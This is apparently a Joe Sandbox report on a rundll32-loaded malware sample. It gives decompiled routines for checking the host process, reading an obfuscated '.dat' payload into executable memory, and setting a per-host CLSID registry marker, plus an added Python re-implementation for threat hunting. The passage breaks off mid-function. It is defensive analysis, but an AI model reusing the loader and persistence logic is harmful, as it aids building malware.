                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process32$ChangeCloseCreateCurrentFindFirstNextNotificationProcessSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 1594840063-0
                                                            • Opcode ID: bb876c8c4d321a5e7614f1bba84db3da607ffce4040a7e56f84b5e2ac3d25e5c
                                                            • Instruction ID: 9a56b4ed027879995f2de30101c186a7b35e79593f16ded543d16000bd105cb7
                                                            • Opcode Fuzzy Hash: bb876c8c4d321a5e7614f1bba84db3da607ffce4040a7e56f84b5e2ac3d25e5c
                                                            • Instruction Fuzzy Hash: B6014471601228ABDB10EF54DC8CBADB7B8EF45350F1001D9E909D3240FB386E45CB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 77%
                                                            			E04646050(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				short _v12;
                                                            				intOrPtr _v16;
                                                            				intOrPtr _v20;
                                                            				intOrPtr _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v40;
                                                            				intOrPtr _v44;
                                                            				intOrPtr _v48;
                                                            				intOrPtr _v52;
                                                            				intOrPtr _v56;
                                                            				intOrPtr _v60;
                                                            				intOrPtr _v64;
                                                            				intOrPtr _v68;
                                                            				intOrPtr _v72;
                                                            				intOrPtr _v76;
                                                            				intOrPtr _v80;
                                                            				intOrPtr _v84;
                                                            				char _v88;
                                                            				intOrPtr _v92;
                                                            				intOrPtr _v96;
                                                            				intOrPtr _v100;
                                                            				intOrPtr _v104;
                                                            				intOrPtr _v108;
                                                            				short _v112;
                                                            				intOrPtr _v116;
                                                            				intOrPtr _v120;
                                                            				intOrPtr _v124;
                                                            				intOrPtr _v128;
                                                            				intOrPtr _v132;
                                                            				intOrPtr _v136;
                                                            				intOrPtr _v140;
                                                            				intOrPtr _v144;
                                                            				intOrPtr _v148;
                                                            				intOrPtr _v152;
                                                            				intOrPtr _v156;
                                                            				intOrPtr _v160;
                                                            				intOrPtr _v164;
                                                            				intOrPtr _v168;
                                                            				intOrPtr _v172;
                                                            				short _v176;
                                                            				char _v252;
                                                            				void* _v256;
                                                            				int _v260;
                                                            				intOrPtr _v264;
                                                            				int _v268;
                                                            				signed int _t110;
                                                            				long _t117;
                                                            				intOrPtr _t118;
                                                            				signed int _t119;
                                                            				intOrPtr* _t142;
                                                            				void* _t144;
                                                            				signed int _t145;
                                                            				signed int _t147;
                                                            				signed short* _t156;
                                                            				signed int _t166;
                                                            				intOrPtr* _t169;
                                                            				signed int _t171;
                                                            				void* _t173;
                                                            				signed int _t175;
                                                            
                                                            				_t110 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t110 ^ _t175;
                                                            				_v264 = __edx;
                                                            				_v12 = 0;
                                                            				_v88 = 0x47007b;
                                                            				_t142 = __ecx;
                                                            				_v84 = 0x350036;
                                                            				_v80 = 0x590037;
                                                            				_v76 = 0x300053;
                                                            				_v72 = 0x2d0036;
                                                            				_v68 = 0x310030;
                                                            				_v64 = 0x440036;
                                                            				_v60 = 0x34002d;
                                                            				_v56 = 0x300043;
                                                            				_v52 = 0x2d0052;
                                                            				_v48 = 0x300036;
                                                            				_v44 = 0x320032;
                                                            				_v40 = 0x46002d;
                                                            				_v36 = 0x450047;
                                                            				_v32 = 0x430032;
                                                            				_v28 = 0x320033;
                                                            				_v24 = 0x360032;
                                                            				_v20 = 0x370036;
                                                            				_v16 = 0x7d0046;
                                                            				_v260 = 0x4a;
                                                            				_v176 = 0x4f0053;
                                                            				_v172 = 0x540046;
                                                            				_v168 = 0x410057;
                                                            				_v164 = 0x450052;
                                                            				_v160 = 0x4d005c;
                                                            				_v156 = 0x630069;
                                                            				_v152 = 0x6f0072;
                                                            				_v148 = 0x6f0073;
                                                            				_v144 = 0x740066;
                                                            				_v140 = 0x43005c;
                                                            				_v136 = 0x790072;
                                                            				_v132 = 0x740070;
                                                            				_v128 = 0x67006f;
                                                            				_v124 = 0x610072;
                                                            				_v120 = 0x680070;
                                                            				_v116 = 0x79;
                                                            				_v112 = 0x61004d;
                                                            				_v108 = 0x680063;
                                                            				_v104 = 0x6e0069;
                                                            				_v100 = 0x470065;
                                                            				_v96 = 0x690075;
                                                            				_v92 = 0x64;
                                                            				E0465DEA0(__edi,  &_v252, 0, 0x4a);
                                                            				_v256 = 0;
                                                            				_t117 = RegOpenKeyExW(0x80000002,  &_v176, 0, 0x20119,  &_v256); // executed
                                                            				if(_t117 == 0) {
                                                            					RegQueryValueExW(_v256,  &_v112, 0,  &_v268,  &_v252,  &_v260); // executed
                                                            					_t174 =  ==  ? 1 : 0;
                                                            					RegCloseKey(_v256);
                                                            					_t180 =  ==  ? 1 : 0;
                                                            					if(( ==  ? 1 : 0) != 0 && _v260 == 0x4a) {
                                                            						asm("movups xmm0, [ebp-0xf8]");
                                                            						asm("movups [ebp-0x52], xmm0");
                                                            						asm("movups xmm0, [ebp-0xe8]");
                                                            						asm("movups [ebp-0x42], xmm0");
                                                            						asm("movups xmm0, [ebp-0xd8]");
                                                            						asm("movups [ebp-0x32], xmm0");
                                                            						asm("movups xmm0, [ebp-0xc8]");
                                                            						asm("movups [ebp-0x22], xmm0");
                                                            						asm("movq xmm0, [ebp-0xb8]");
                                                            						asm("movq [ebp-0x12], xmm0");
                                                            					}
                                                            				}
                                                            				_t169 = _t142;
                                                            				_t144 = _t169 + 2;
                                                            				do {
                                                            					_t118 =  *_t169;
                                                            					_t169 = _t169 + 2;
                                                            				} while (_t118 != 0);
                                                            				_t166 = 1;
                                                            				_t171 = _t169 - _t144 >> 1;
                                                            				asm("o16 nop [eax+eax]");
                                                            				do {
                                                            					_t119 =  *(_t175 + _t166 * 2 - 0x54) & 0x0000ffff;
                                                            					if(_t119 >= 0x61 && _t119 <= 0x7a) {
                                                            						 *(_t175 + _t166 * 2 - 0x54) = _t119 + 0xffffffe0;
                                                            					}
                                                            					if( *(_t175 + _t166 * 2 - 0x54) != 0x2d) {
                                                            						asm("cdq");
                                                            						 *(_t175 + _t166 * 2 - 0x54) =  *(_t175 + _t166 * 2 - 0x54) ^  *(_t142 + _t166 % _t171 * 2);
                                                            						_t145 =  *(_t175 + _t166 * 2 - 0x54) & 0x0000ffff;
                                                            						if(_t145 >= 0x30) {
                                                            							_t89 = _t145 - 0x3a; // -13
                                                            							if(_t89 > 6) {
                                                            								if(_t145 > 0x5a) {
                                                            									 *(_t175 + _t166 * 2 - 0x54) = 0x5a - _t145 % 0x1a;
                                                            								}
                                                            							} else {
                                                            								 *(_t175 + _t166 * 2 - 0x54) = _t145 % 0x1a + 0x41;
                                                            							}
                                                            						} else {
                                                            							 *(_t175 + _t166 * 2 - 0x54) = _t145 % 0xa + 0x30;
                                                            						}
                                                            					}
                                                            					_t166 = _t166 + 1;
                                                            				} while (_t166 < 0x25);
                                                            				_t156 =  &_v88;
                                                            				_t173 = _v264 - _t156;
                                                            				do {
                                                            					_t147 =  *_t156 & 0x0000ffff;
                                                            					_t156 =  &(_t156[1]);
                                                            					 *(_t173 + _t156 - 2) = _t147;
                                                            				} while (_t147 != 0);
                                                            				return E04655AFE(_v8 ^ _t175);
                                                            			}

Instruction addresses: 0x04646059 to 0x04646360 (per-line address gutter of the decompiled function above)

                                                            APIs
                                                            • RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                            • RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                            • RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: -$-$-$0$2$2$2$3$6$6$6$6$6$7$C$F$F$G$J$M$R$R$S$S$W$\$\$c$d$e$f$i$i$o$p$p$r$r$r$s$u$y
                                                            • API String ID: 3677997916-1672344200
                                                            • Opcode ID: 7b90442ebcd07b23da58d74e1b24e8fa5cc1d390b5fec1958994000bd441440e
                                                            • Instruction ID: c18e3699a8c8d5f31161716c76eb1ea89fb202f28fbb988f754a06fa63a47b37
                                                            • Opcode Fuzzy Hash: 7b90442ebcd07b23da58d74e1b24e8fa5cc1d390b5fec1958994000bd441440e
                                                            • Instruction Fuzzy Hash: 27818DB0E0025DCBDF258F94D9487EEBBB5FF45304F0091AAD409AB201E7B95A89CF84
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

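The loop in the routine above (addresses 0x04646059 to 0x04646360; E04646C70 further down calls it as E04646050 with the key L"SEOID" and formats its output into SOFTWARE\\Classes\\CLSID\\%s under HKEY_LOCAL_MACHINE, 0x80000002) derives a per-host key name from a 36-character GUID string obtained via RegQueryValueExW (data size 0x4A = 37 wide characters). For a 1-based counter i over the 36 characters it uppercases a-z, leaves hyphens untouched, XORs every other character with key[i mod len(key)], and folds the result back into the alphabet 0-9 / A-Z. The Python below is an added re-implementation written for this report, not code from the sample or from Joe Sandbox. The GUID is a constructed value; which registry value the sample reads is only partly visible here (the pushed value name starts with L"Ma", the key path with L"SO"), and the assumption that the loop counter addresses the i-th GUID character follows the decompiled index arithmetic. Its use for a defender is to compute the CLSID subkey name a given host would get from the same input.

```python
"""Re-implementation of the GUID-to-CLSID-name transform decompiled above.

Added example, not code from the sample or from the report. SAMPLE_GUID is
a constructed value; the registry value the sample actually reads is only
partly visible in the report (its name begins with L"Ma").
"""

# Format string seen in E04646C70 (wsprintfW), opened under HKEY_LOCAL_MACHINE.
HKLM_CLSID_FMT = "SOFTWARE\\Classes\\CLSID\\%s"


def fold_char(c: int) -> int:
    """Mirror the range folding applied after the XOR; output is always 0-9 or A-Z."""
    if c >= 0x30:
        if c - 0x3A > 6:                 # signed test in the original: c > 0x40
            if c > 0x5A:
                return 0x5A - c % 0x1A   # above 'Z': wrap back into 'A'..'Z'
            return c                     # already 'A'..'Z', left as is
        return c % 0x1A + 0x41           # '0'..'@' -> letter
    return c % 0x0A + 0x30               # below '0' -> digit


def derive_clsid_name(guid: str, key: str = "SEOID") -> str:
    """Transform a 36-character GUID (no braces) the way the decompiled loop does."""
    if len(guid) != 36:
        raise ValueError("expected a 36-character GUID without braces")
    out = []
    # The decompiled counter runs 1..36 and is reused unchanged as the key index.
    # Assumption: counter i addresses the i-th character of the GUID.
    for i, ch in enumerate(guid, start=1):
        c = ord(ch) & 0xFFFF
        if 0x61 <= c <= 0x7A:
            c -= 0x20                    # uppercase a-z (0x61..0x7a -> -0x20)
        if c != 0x2D:                    # hyphens survive untouched
            c ^= ord(key[i % len(key)])  # cyclic XOR with the key string
            c = fold_char(c)
        out.append(chr(c))
    return "".join(out)


def clsid_key_path(guid: str, key: str = "SEOID") -> str:
    """Subkey (relative to HKLM) that E04646C70 opens with RegOpenKeyExW or creates."""
    return HKLM_CLSID_FMT % derive_clsid_name(guid, key)


SAMPLE_GUID = "12345678-90ab-cdef-1234-567890abcdef"   # constructed, not from the report

if __name__ == "__main__":
    print(derive_clsid_name(SAMPLE_GUID))
    print("HKLM\\" + clsid_key_path(SAMPLE_GUID))
```

Two properties of the transform are worth noting when hunting: the hyphens at positions 9, 14, 19 and 24 survive, so the subkey still looks GUID-shaped, but the output alphabet is 0-9 plus all of A-Z, so the derived name will in practice contain letters outside A-F that no real CLSID can have. A CLSID subkey under HKLM\SOFTWARE\Classes with a non-hex name, holding the DWORD value "1" that E04646C70 writes with RegSetValueExW, is the artifact this routine leaves behind.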
                                                            Control-flow Graph

                                                            C-Code - Quality: 92%
                                                            			E0464C250(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				char _v208;
                                                            				short _v728;
                                                            				short _v1248;
                                                            				short _v1768;
                                                            				long _v1772;
                                                            				signed int _t19;
                                                            				int _t31;
                                                            				int _t34;
                                                            				void* _t37;
                                                            				signed int _t39;
                                                            				void* _t43;
                                                            				void* _t46;
                                                            				void* _t48;
                                                            				void* _t50;
                                                            				void* _t58;
                                                            				void* _t61;
                                                            				void* _t64;
                                                            				void* _t67;
                                                            				intOrPtr _t68;
                                                            				intOrPtr _t70;
                                                            				void* _t93;
                                                            				long _t94;
                                                            				void* _t96;
                                                            				void* _t97;
                                                            				void* _t98;
                                                            				signed int _t99;
                                                            
                                                            				_t64 = __ecx;
                                                            				_t61 = __ebx;
                                                            				_t19 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t19 ^ _t99;
                                                            				_t96 = GetModuleFileNameW;
                                                            				_t93 = __ecx;
                                                            				GetModuleFileNameW(0,  &_v1248, 0x104);
                                                            				if(lstrcmpiW(E0465D9BE( &_v1248, 0x5c) + 2, L"rundll32.exe") != 0) {
                                                            					GetModuleFileNameW(0,  &_v728, 0x104);
                                                            					_t31 = E0465D9BE( &_v728, 0x2e) + 2;
                                                            					__eflags = _t31;
                                                            					if(_t31 != 0) {
                                                            						_t67 =  *L"dat"; // 0x610064
                                                            						 *_t31 = _t67;
                                                            						_t68 =  *0x467f710; // 0x74
                                                            						 *((intOrPtr*)(_t31 + 4)) = _t68;
                                                            						_t34 = PathFileExistsW( &_v728);
                                                            						__eflags = _t34;
                                                            						if(_t34 != 0) {
                                                            							goto L5;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					_push(_t64);
                                                            					_t58 = E0464C130(_t93,  &_v1768,  &_v728);
                                                            					_t106 = _t58;
                                                            					if(_t58 != 0) {
                                                            						MoveFileExW( &_v1768, 0, 4); // executed
                                                            						L5:
                                                            						E0465DEA0(_t93,  &_v208, 0, 0xc8);
                                                            						_t37 = E04646FC0(_t61,  &_v208, _t93, _t96, _t106); // executed
                                                            						_t97 = _t37;
                                                            						_t107 = _t97;
                                                            						if(_t97 <= 0) {
                                                            							_t70 =  *0x46865f8; // 0x38f, executed
                                                            							E04646C70(_t61, _t70, _t93, _t97, __eflags); // executed
                                                            						} else {
                                                            							E04646C70(_t61, _t97, _t93, _t97, _t107);
                                                            							E04646DF0( &_v208, _t97);
                                                            						}
                                                            						_t39 = E04645960(); // executed
                                                            						_v1772 = 0;
                                                            						asm("sbb eax, eax");
                                                            						_t43 = E04649770( &_v1772,  &_v728,  ~( ~_t39) + 1); // executed
                                                            						_t98 = _t43;
                                                            						if(_t98 != 0) {
                                                            							_t94 = _v1772;
                                                            							_t109 = _t94;
                                                            							if(_t94 != 0) {
                                                            								E046496B0(_t61, _t98, _t94, _t94, _t98, _t109); // executed
                                                            								E04645540(_t98, _t94);
                                                            								_t46 = E046494D0(_t61, L"Control", _t94, _t98, _t109); // executed
                                                            								if(_t46 == 0x1fffffff || _t46 == 0x2fffffff) {
                                                            									E046378B0(_t61, L"Control", 0, _t94, _t98, 0);
                                                            								}
                                                            								_t48 = E046494D0(_t61, L"Dispatch", _t94, _t98, 0); // executed
                                                            								if(_t48 == 0x1fffffff || _t48 == 0x2fffffff) {
                                                            									E046378B0(_t61, L"Dispatch", 0, _t94, _t98, 0);
                                                            								}
                                                            								_t50 = E0464BD60(_t61, _t98, _t94, _t94, _t98); // executed
                                                            								if(_t50 <= 0) {
                                                            									_push(_t61);
                                                            									do {
                                                            										L0464BBC0();
                                                            										Sleep(0x3e8);
                                                            									} while (E0464BD60(Sleep, _t98, _t94, _t94, _t98) <= 0);
                                                            								}
                                                            								VirtualFree(_t98, 0, 0x8000); // executed
                                                            								DeleteFileW( &_v728); // executed
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t99);
                                                            			}

Instruction addresses: 0x0464c250 to 0x0464c45b (per-line address gutter of the decompiled function above)

                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000001,00000000), ref: 0464C27B
                                                            • lstrcmpiW.KERNEL32(-00000002,rundll32.exe), ref: 0464C297
                                                            • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 0464C2CC
                                                              • Part of subcall function 04646C70: wsprintfW.USER32 ref: 04646CB8
                                                              • Part of subcall function 04646C70: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04646CF5
                                                              • Part of subcall function 04646C70: RegQueryValueExW.ADVAPI32(?,0467E09C,00000000,?,?,?), ref: 04646D20
                                                              • Part of subcall function 04646C70: RegCloseKey.ADVAPI32(?), ref: 04646D36
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0464C2DC
                                                            • PathFileExistsW.SHLWAPI(?), ref: 0464C310
                                                            • Sleep.KERNEL32(000003E8,?), ref: 0464C421
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0464C439
                                                            • DeleteFileW.KERNEL32(?), ref: 0464C446
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$ModuleName$CloseDeleteExistsFreeMoveOpenPathQuerySleepValueVirtuallstrcmpiwsprintf
                                                            • String ID: Control$Dispatch$dat$rundll32.exe
                                                            • API String ID: 2408718126-2128312152
                                                            • Opcode ID: c366bcac9fbb615640a474960a4eb6dd9f2cbd43ced17880e35b464b33ff27b9
                                                            • Instruction ID: 81fd11e69df8f1955615ed74de13e4fd206cc4558acdb5c97a061991ce2f6bec
                                                            • Opcode Fuzzy Hash: c366bcac9fbb615640a474960a4eb6dd9f2cbd43ced17880e35b464b33ff27b9
                                                            • Instruction Fuzzy Hash: 3B41F0B1A012189BFF24AB24DC84FAE736ADBD0718F054299D505E73C0FE74BE058B99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 94%
                                                            			E04646C70(void* __ebx, char __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				char _v616;
                                                            				int _v620;
                                                            				int _v624;
                                                            				signed int _t28;
                                                            				long _t38;
                                                            				long _t41;
                                                            				char _t57;
                                                            				signed int _t71;
                                                            
                                                            				_t28 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t28 ^ _t71;
                                                            				_t57 = __ecx;
                                                            				_v616 = 0;
                                                            				_v620 = 4;
                                                            				E04646050(__ecx, L"SEOID",  &_v88, __edi, __esi); // executed
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				E0465DEA0(__edi,  &_v616, 0, _v620);
                                                            				_v612 = 0;
                                                            				_t38 = RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612); // executed
                                                            				if(_t38 != 0) {
                                                            					L3:
                                                            					_v616 = _t57;
                                                            					_v620 = 4;
                                                            					_v612 = 0;
                                                            					_t41 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0); // executed
                                                            					if(_t41 != 0) {
                                                            						L5:
                                                            						return E04655AFE(_v8 ^ _t71);
                                                            					} else {
                                                            						RegSetValueExW(_v612, "1", 0, 4,  &_v616, 4); // executed
                                                            						_t69 =  ==  ? 1 : 0;
                                                            						RegCloseKey(_v612);
                                                            						__eflags =  ==  ? 1 : 0;
                                                            						if(( ==  ? 1 : 0) != 0) {
                                                            							goto L2;
                                                            						} else {
                                                            							goto L5;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					RegQueryValueExW(_v612, "1", 0,  &_v624,  &_v616,  &_v620);
                                                            					_t70 =  ==  ? 1 : 0;
                                                            					RegCloseKey(_v612);
                                                            					_t77 =  ==  ? 1 : 0;
                                                            					if(( ==  ? 1 : 0) == 0) {
                                                            						goto L3;
                                                            					} else {
                                                            						L2:
                                                            						return E04655AFE(_v8 ^ _t71);
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 04646CB8
                                                            • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 04646CF5
                                                            • RegQueryValueExW.ADVAPI32(?,0467E09C,00000000,?,?,?), ref: 04646D20
                                                            • RegCloseKey.ADVAPI32(?), ref: 04646D36
                                                            • RegCreateKeyExW.KERNEL32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04646D8B
                                                            • RegSetValueExW.KERNEL32(?,0467E09C,00000000,00000004,?,00000004), ref: 04646DAC
                                                            • RegCloseKey.ADVAPI32(?), ref: 04646DC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseValue$OpenQuery$Createwsprintf
                                                            • String ID: SEOID$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 3707868688-3437544703
                                                            • Opcode ID: 35a7a3ed4e1b9ca2e67916ee1b8371bd8d7c8fd8f0e95fff8066ada754181573
                                                            • Instruction ID: 4a3753e00869e1d232b717d564fc80b3900fce02c11a337b6ec18707d7f29c6c
                                                            • Opcode Fuzzy Hash: 35a7a3ed4e1b9ca2e67916ee1b8371bd8d7c8fd8f0e95fff8066ada754181573
                                                            • Instruction Fuzzy Hash: D1310E71A0922CABDB209FA0DC8CBEABBBCEF45710F0001D9A909E6111E7365E44DF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 92%
                                                            			E046494D0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				char _v612;
                                                            				void* _v616;
                                                            				int _v620;
                                                            				int _v624;
                                                            				signed int _t25;
                                                            				long _t35;
                                                            				char _t44;
                                                            				void* _t49;
                                                            				signed int _t65;
                                                            
                                                            				_t25 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t25 ^ _t65;
                                                            				E04646050(__ebx, __ecx,  &_v88, __edi, __esi); // executed
                                                            				_v612 = 0;
                                                            				_v620 = 4;
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				E0465DEA0(__edi,  &_v612, 0, _v620);
                                                            				_v616 = 0;
                                                            				_t35 = RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v616); // executed
                                                            				if(_t35 != 0) {
                                                            					L6:
                                                            					goto L7;
                                                            				} else {
                                                            					RegQueryValueExW(_v616, "1", 0,  &_v624,  &_v612,  &_v620);
                                                            					_t64 =  ==  ? 1 : 0;
                                                            					RegCloseKey(_v616);
                                                            					_t72 =  ==  ? 1 : 0;
                                                            					if(( ==  ? 1 : 0) == 0) {
                                                            						goto L6;
                                                            					} else {
                                                            						_t44 = _v612 - 0x13c;
                                                            						_v612 = _t44;
                                                            						if(_t44 == 0x1fffffff || _t44 == 0x2fffffff) {
                                                            							L7:
                                                            							return E04655AFE(_v8 ^ _t65);
                                                            						} else {
                                                            							wsprintfW( &_v608, L"Global\\%s",  &_v88);
                                                            							_t49 = OpenEventW(0x1f0003, 0,  &_v608);
                                                            							if(_t49 == 0) {
                                                            								return E04655AFE(_v8 ^ _t65);
                                                            							} else {
                                                            								CloseHandle(_t49);
                                                            								goto L6;
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 04649510
                                                            • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 0464954D
                                                            • RegQueryValueExW.ADVAPI32(?,0467E09C,00000000,?,00000000,?), ref: 0464957C
                                                            • RegCloseKey.ADVAPI32(?), ref: 04649592
                                                            • wsprintfW.USER32 ref: 046495CB
                                                            • OpenEventW.KERNEL32(001F0003,00000000,?), ref: 046495E2
                                                            • CloseHandle.KERNEL32(00000000), ref: 046495ED
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpen$QueryValuewsprintf$EventHandle
                                                            • String ID: Global\%s$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 1348839613-2346361075
                                                            • Opcode ID: db37772194fdd7611ef3776b4ec18788e3ea67820bbf850cdf08a4a711d51320
                                                            • Instruction ID: f291d5e431a42be6577783cc515fc3442ca567001123b3a2960f5df596bf05c5
                                                            • Opcode Fuzzy Hash: db37772194fdd7611ef3776b4ec18788e3ea67820bbf850cdf08a4a711d51320
                                                            • Instruction Fuzzy Hash: AA31417194521C9BDB24DFA4DD8CBEA77BCEF44714F100195A909E2144FB35AE48CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            [Control-flow graph rendered as an image in the original report (legend: Executed / Not Executed). Basic blocks 4649770 through 46498fc, with calls to CreateFileW, GetFileSize, ReadFile, SetFilePointer, VirtualAlloc, VirtualFree, CloseHandle, FindCloseChangeNotification and call 4645540.]
                                                            C-Code - Quality: 100%
                                                            			E04649770(intOrPtr* __ecx, WCHAR* __edx, intOrPtr _a4) {
                                                            				void _v8;
                                                            				long _v12;
                                                            				void* _v16;
                                                            				void* _v20;
                                                            				intOrPtr* _v24;
                                                            				void* _t36;
                                                            				intOrPtr _t40;
                                                            				void* _t41;
                                                            				signed char _t46;
                                                            				int _t52;
                                                            				void _t53;
                                                            				long _t60;
                                                            				void* _t62;
                                                            				intOrPtr* _t67;
                                                            				WCHAR* _t68;
                                                            				long _t69;
                                                            				long _t71;
                                                            				void* _t76;
                                                            
                                                            				_t68 = __edx;
                                                            				_t76 = 0;
                                                            				_v24 = __ecx;
                                                            				_v8 = 0;
                                                            				_v12 = 0;
                                                            				if(__ecx != 0) {
                                                            					 *__ecx = 0;
                                                            				}
                                                            				_t36 = CreateFileW(_t68, 0x80000000, 0, 0, 3, 0x80, 0); // executed
                                                            				_v16 = _t36;
                                                            				if(_t36 == 0xffffffff) {
                                                            					L32:
                                                            					return _t76;
                                                            				} else {
                                                            					_t60 = GetFileSize(_t36, 0);
                                                            					_v20 = _t76;
                                                            					if(_t60 < 1) {
                                                            						L31:
                                                            						FindCloseChangeNotification(_v16); // executed
                                                            						goto L32;
                                                            					} else {
                                                            						_t40 = _a4;
                                                            						if(_t40 != 1) {
                                                            							if(_t40 != 2) {
                                                            								_t71 = _t60;
                                                            								goto L15;
                                                            							} else {
                                                            								_t52 = ReadFile(_v16,  &_v8, 4,  &_v12, 0); // executed
                                                            								if(_t52 == 0) {
                                                            									goto L30;
                                                            								} else {
                                                            									_t53 = _v8;
                                                            									if(_t53 > _t60) {
                                                            										_t53 = _t53 - 0xc8372a;
                                                            										_v20 = 1;
                                                            										_v8 = _t53;
                                                            									}
                                                            									_t71 = _t60 - _t53 - 4;
                                                            									if(_t71 < 1) {
                                                            										goto L30;
                                                            									} else {
                                                            										_t62 = _v16;
                                                            										SetFilePointer(_t62, _t53 + 4, 0, 0); // executed
                                                            										goto L16;
                                                            									}
                                                            								}
                                                            							}
                                                            						} else {
                                                            							if(ReadFile(_v16,  &_v8, 4,  &_v12, 0) == 0) {
                                                            								L30:
                                                            								goto L31;
                                                            							} else {
                                                            								_t71 = _v8;
                                                            								if(_t71 > _t60) {
                                                            									_t71 = _t71 - 0xc8372a;
                                                            									_v20 = 1;
                                                            									_v8 = _t71;
                                                            								}
                                                            								L15:
                                                            								_t62 = _v16;
                                                            								L16:
                                                            								_t41 = VirtualAlloc(0, _t71, 0x1000, 0x40); // executed
                                                            								_t76 = _t41;
                                                            								if(_t76 == 0 || ReadFile(_t62, _t76, _t71,  &_v12, 0) == 0) {
                                                            									goto L30;
                                                            								} else {
                                                            									_t69 = _v12;
                                                            									if(_t69 == _t71) {
                                                            										if(_v20 != 0 && _t69 > 1) {
                                                            											_t46 = 0;
